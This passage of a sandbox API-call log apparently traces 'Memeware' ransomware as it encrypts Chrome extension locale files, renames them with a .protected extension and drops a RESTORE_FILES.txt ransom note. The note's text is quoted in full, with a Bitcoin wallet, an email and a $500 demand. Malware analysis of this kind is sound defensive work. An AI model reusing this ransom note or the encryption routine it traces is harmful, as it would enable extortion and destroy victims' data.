lpString2="Windows") returned -1 [0083.718] lstrcmpiW (lpString1="iw", lpString2="Program Files") returned -1 [0083.718] lstrcmpiW (lpString1="iw", lpString2="Program Files (x86)") returned -1 [0083.718] lstrcmpiW (lpString1="iw", lpString2="$Recycle.bin") returned 1 [0083.718] lstrcmpiW (lpString1="iw", lpString2="System Volume Information") returned -1 [0083.718] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw") returned 150 [0083.718] lstrcmpW (lpString1="iw", lpString2=".") returned 1 [0083.718] lstrcmpW (lpString1="iw", lpString2="..") returned 1 [0083.718] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\*") returned 152 [0083.718] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.718] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.718] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.718] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.718] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.718] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.718] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\.") returned 152 [0083.718] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.719] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.719] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.719] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.719] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.719] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.719] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.719] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\..") returned 153 [0083.719] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.719] 
lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.719] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.719] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.719] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.719] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.719] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.719] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.719] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json") returned 164 [0083.719] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.719] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.719] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.719] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.719] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.732] lstrlenW 
(lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json") returned 164 [0083.732] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.732] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json") returned 164 [0083.732] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.732] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json") returned 164 [0083.732] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.732] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.738] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.738] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.738] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.738] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.742] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, 
lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.742] CloseHandle (hObject=0x168) returned 1 [0083.742] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json.protected") returned 174 [0083.743] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\messages.json.protected")) returned 1 [0083.744] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.744] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.744] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\RESTORE_FILES.txt") returned 168 [0083.744] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\iw\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.744] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.744] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, 
nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.745] lstrlenA (lpString="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") returned 684 [0083.745] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.745] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.746] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0083.746] CloseHandle (hObject=0x164) returned 1 [0083.746] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.746] lstrcmpiW (lpString1="ja", lpString2="Windows") returned -1 [0083.746] lstrcmpiW (lpString1="ja", lpString2="Program Files") returned -1 [0083.746] lstrcmpiW (lpString1="ja", lpString2="Program Files (x86)") returned -1 [0083.746] lstrcmpiW (lpString1="ja", lpString2="$Recycle.bin") returned 1 [0083.746] lstrcmpiW (lpString1="ja", lpString2="System Volume Information") returned -1 [0083.746] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja") returned 150 [0083.746] lstrcmpW (lpString1="ja", lpString2=".") returned 1 [0083.746] lstrcmpW (lpString1="ja", lpString2="..") returned 1 [0083.746] wnsprintfW (in: pszDest=0xd010e0, 
cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\*") returned 152 [0083.746] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.747] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.747] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.747] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.747] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.747] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.747] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\.") returned 152 [0083.747] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0083.747] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.747] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0083.747] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0083.747] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0083.747] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0083.747] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0083.747] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User 
Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\..") returned 153 [0083.747] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0083.747] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0083.747] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0083.747] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0083.747] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0083.747] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0083.747] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0083.747] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0083.747] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json") returned 164 [0083.747] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0083.749] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0083.749] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0083.749] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0083.749] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0083.750] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json") returned 164 [0083.750] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0083.750] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json") returned 164 [0083.750] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0083.750] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json") returned 164 [0083.750] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0083.750] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.769] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0083.769] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0x2800, lpOverlapped=0x0) returned 1 [0083.769] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0083.769] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: 
lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0083.774] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0083.774] CloseHandle (hObject=0x168) returned 1 [0083.774] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json.protected") returned 174 [0083.774] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\messages.json.protected")) returned 1 [0083.774] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0083.775] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0083.775] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\RESTORE_FILES.txt") returned 
168 [0083.775] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ja\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0083.775] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0083.775] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0083.776] lstrlenA (lpString="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") returned 684 [0083.776] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0083.776] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0083.776] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0083.776] CloseHandle (hObject=0x164) returned 1 [0083.776] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0083.776] lstrcmpiW (lpString1="kn", lpString2="Windows") returned -1 [0083.776] lstrcmpiW (lpString1="kn", lpString2="Program Files") returned -1 [0083.776] lstrcmpiW (lpString1="kn", lpString2="Program Files (x86)") returned -1 [0083.776] lstrcmpiW (lpString1="kn", lpString2="$Recycle.bin") returned 1 [0083.776] lstrcmpiW (lpString1="kn", lpString2="System Volume Information") returned -1 [0083.776] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn") returned 150 [0083.776] lstrcmpW (lpString1="kn", lpString2=".") returned 1 [0083.776] lstrcmpW (lpString1="kn", lpString2="..") returned 1 [0083.776] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\*") returned 152 [0083.776] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\kn\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0083.777] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0083.777] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0083.777] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0083.777] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0083.777] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0083.777] wnsprintfW (in: pszDest=0xd010e0, 
